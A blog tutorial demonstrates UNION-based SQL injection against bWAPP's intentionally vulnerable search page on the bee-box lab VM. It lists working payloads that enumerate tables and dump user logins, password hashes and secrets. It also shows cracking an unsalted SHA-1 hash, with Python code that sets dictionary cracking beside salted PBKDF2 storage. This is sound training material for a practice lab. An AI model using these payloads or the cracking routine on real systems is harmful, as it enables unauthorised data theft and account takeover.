Exploit SQL Injection (GET/Search) flaw on BWAPP

In this post I will use bWAPP, installed in the bee-box VM, to test a SQL injection flaw.

First, for background on what a SQL injection (SQLi) flaw is, see the linked introduction. In this post I will show one way to exploit it.
Now let's move on. Open bWAPP in a browser (Firefox, Chrome, etc.) and log in with the default credentials: username bee, password bug. After logging in you land on the bug selection page.
Next, pick the SQL Injection (GET/Search) vulnerability from the list.
Click the Hack button and the search page appears.
If you leave the search string empty, the page returns the full movie list from the database.
Then I search for the letter m followed by a ' symbol (m') to see what comes back.
After pressing Search I get this error message: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1

This message confirms the injection point: our single quote closed the string literal early, and the %' that MySQL complains about is the tail of the application's own LIKE '%...%' pattern, left dangling after it. From here we can use the SQL UNION statement to append rows from other tables to the movie result.
First of all, a UNION SELECT must return exactly the same number of columns as the original SELECT, so we need to find that count. ORDER BY with a column position does the job:
  • m' order by 1-- -
If you press Search and get the message "No movies were found!", that column position exists, so try the next number (replace 1 with 2, 3, 4, 5, 6, 7, ...) until you see: Error: Unknown column 'N' in 'order clause' (where N is the number you just tried). The first number that errors is one more than the number of columns.
Here I got 7 columns.
Now use UNION ALL SELECT with all 7 columns:
  • m' union all select 1,2,3,4,5,6,7 -- -
No error this time, which is great. The literals 1 to 7 show up in the page where the movie fields would, so we can replace any of them with a function or column name and read the result. The current database name, for example:
  • m' union all select 1,database(),3,4,5,6,7 -- -
We have found the name of the current database: bWAPP
Now our mission is to retrieve the table names of the current database:
  • m' union all select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=database() -- -
I will pick the users table. To retrieve its column names:
  • m' union all select 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='users' and table_schema=database() -- -
The users table has 9 columns, but I only want the values of the login, password and secret columns. Let's see them:
  • m' union all select 1,login,password,secret,5,6,7 from users -- -
In the row for the bee user the password column holds a SHA-1 hash: 6885858486f31043e5839c735d99457f045affd0. Save this hash to a .txt file and run John the Ripper against it to recover the plaintext.
John returned the word "bug", which is the password of the bee user.
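The cracking step, as an added example rather than the author's john run: a dictionary attack on the unsalted SHA-1 taken from the users table, which is what john --format=raw-sha1 does for this hash type (minus its wordlist rules and speed), followed by the salted, slow password storage (PBKDF2) that would have made the same attack impractical. The wordlist is constructed; only the hash value comes from the post.

```python
import hashlib
import hmac
import os

# The hash dumped from the users table on the page, plus a constructed mini
# wordlist standing in for the dictionary john would use.
LEAKED_SHA1 = "6885858486f31043e5839c735d99457f045affd0"
WORDLIST = ["password", "123456", "bee", "bwapp", "bug", "letmein"]


def crack_sha1(target_hex, words):
    """Dictionary attack on an unsalted SHA-1: hash every candidate and compare.
    Works because the same password always gives the same digest, so one
    precomputed hash per word covers every user of the application."""
    target = target_hex.lower()
    for word in words:
        if hashlib.sha1(word.encode()).hexdigest() == target:
            return word
    return None


def store_password(password, iterations=600_000):
    """What the application should have stored instead: a random per-user salt
    and a slow key derivation, encoded as 'pbkdf2_sha256$iterations$salt$hash'.
    The salt defeats shared wordlist precomputation; the iteration count makes
    each guess cost hundreds of thousands of SHA-256 calls instead of one."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count and compare in
    constant time, so timing does not leak how many bytes matched."""
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("raw sha1 cracked ->", crack_sha1(LEAKED_SHA1, WORDLIST))
    record = store_password("bug")
    print("stored record    ->", record)
    print("verify 'bug'     ->", verify_password("bug", record))
    print("verify 'bee'     ->", verify_password("bee", record))
```

Against the PBKDF2 record the attacker has to rerun the full derivation per candidate per user, with no way to reuse work between users, which is the property the plain SHA-1 in bWAPP's users table lacks.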

End

Above I have shown some basic commands for playing with a database through an injection point. SQL injection can have disastrous consequences, no doubt about it. To understand how SQLi really works you need a good knowledge of MySQL and of databases in general. Self-study, and break things.




About Anonymous

Captain of a team researching hacking, networking, security and the cyber field
1 comment:

  1. This is the best article I could find about SQL injection in bWAPP. Nice one.